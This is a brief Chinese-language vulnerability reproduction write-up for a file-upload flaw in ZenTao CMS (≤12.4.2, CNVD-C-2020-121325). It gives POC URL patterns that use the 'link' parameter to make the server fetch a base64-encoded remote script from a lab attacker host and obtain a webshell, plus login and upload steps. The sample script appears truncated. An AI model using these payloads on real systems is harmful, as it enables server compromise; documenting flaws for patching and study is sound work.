禅道CMS文件上传漏洞（CNVD-C-2020-121325）

1.影响版本

<=12.4.2

2.漏洞描述

       禅道CMS<=12.4.2版本存在文件上传漏洞，该漏洞由于开发者对link参数过滤不严，导致攻击者对下载链接可控，导致可远程下载服务器恶意脚本文件，造成任意代码执行，获取webshell。

3.漏洞POC

1）http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html

2）http:// [目标地址] /www/index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]

4.复现准备：

远程服务器：192.168.157.136

恶意文件地址：http://192.168.157.136/test/test.php

test.php:

";

5.漏洞复现

1）对http头使用大写，且对恶意文件地址base64加密

2）登录禅道后台，使用POC1方法

3）版本添加成功

4）在文件上传位置zentaopms\www\data\client\1查看上传的文件，在浏览器访问上传成功的test.php文件